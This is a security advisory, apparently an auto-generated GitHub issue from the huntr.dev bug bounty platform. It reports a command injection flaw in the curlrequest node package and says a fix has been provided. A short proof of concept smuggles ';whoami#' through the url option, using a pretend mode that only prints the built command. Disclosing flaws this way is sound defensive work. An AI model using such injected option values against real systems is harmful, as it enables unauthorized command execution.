node-js-libs/curlrequest

Security Notice & Bug Bounty - Command Injection - huntr.dev

huntr-helper opened this issue · 1 comments

Overview

curlrequest is a node wrapper for the command line curl.

Affected versions of this package are vulnerable to Command Injection. It is possible to inject arbitrary commands by using a semicolon char in any of the options values.

Proof of Concept

const curl = require("curlrequest");

// Attacker-controlled value placed into one of the request options.
const userPayload = ";whoami#";

// pretend: true makes curlrequest hand back the command it would run in
// `meta` instead of executing it, so the injected command line can be inspected.
curl.request({ url: userPayload, pretend: true }, function(err, stdout, meta) {
  console.log("%s %s", meta.cmd, meta.args.join(" "));
});

Bug Bounty

We have opened up a bounty for this issue on our bug bounty platform. Want to solve this vulnerability and get rewarded 💰? Go to https://huntr.dev/

We will submit a pull request directly to your repository with the fix as soon as possible. Want to learn more? Go to https://github.com/418sec/huntr 📚

Automatically generated by @huntr-helper...

🛠️ A fix has been provided for this issue. Please reference: 418sec#2

🔥 This fix has been provided through the https://huntr.dev/ bug bounty platform.